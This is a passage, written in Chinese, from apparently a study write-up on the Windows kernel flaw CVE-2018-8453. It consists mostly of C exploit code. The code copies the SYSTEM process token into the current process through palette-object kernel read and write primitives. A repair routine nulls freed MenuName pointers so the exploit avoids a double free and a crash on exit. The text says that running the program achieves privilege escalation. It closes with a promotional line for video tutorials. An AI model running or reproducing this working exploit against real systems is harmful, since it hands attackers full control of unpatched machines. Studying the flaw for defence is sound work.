(ulPID != ulCurPID); ULONG64 ulToken = 0; // 将system进程的token赋给当前进程 ulToken = ReadDataByPalette(hManager, hWorker, dwStart, dwEntries, (PVOID)(ulSystemEprocess + dwTokenOffset)); WriteDataByPalette(hManager, hWorker, dwStart, dwEntries, (PVOID)(ulCurEprocess + dwTokenOffset), ulToken); exit: return bRet; }
由于触发漏洞的时候,xxxSBTrackInit会释放掉MenuName所指的内存,为了防止在进程退出,释放资源的时候再次对其进行释放导致双重释放,就需要通过前面在g_ulMenuName中保存的地址修改为NULL来解决该问题,对应代码如下:
BOOL ReapairData_CVE_2018_8453(HPALETTE hManager, HPALETTE hWorker) { BOOL bRet = TRUE; ULONG64 ulValue = 0; DWORD i = 0; DWORD dwEntries = sizeof(ULONG64) / sizeof(PALETTEENTRY); DWORD dwFirstColorOffset = 0x78; DWORD dwStart = (0x800 - 0x88 + dwFirstColorOffset) / 4; for (i = 0; i < 0x400; i++) { if (g_ulMenuName_2018_8453[i]) { if (!WriteDataByPalette(hManager, hWorker, dwStart, dwEntries, (PVOID)g_ulMenuName_2018_8453[i], (ULONG64)ulValue)) { printf("reapair wrong\n"); bRet = FALSE; goto exit; } } else break; } exit: return bRet; }
完整的代码保存在:。运行程序就可以成功提权,且退出程序的时候不会产生BSOD错误:
更多【CVE-2018-8453提权漏洞学习笔记】相关视频教程:www.yxfzedu.com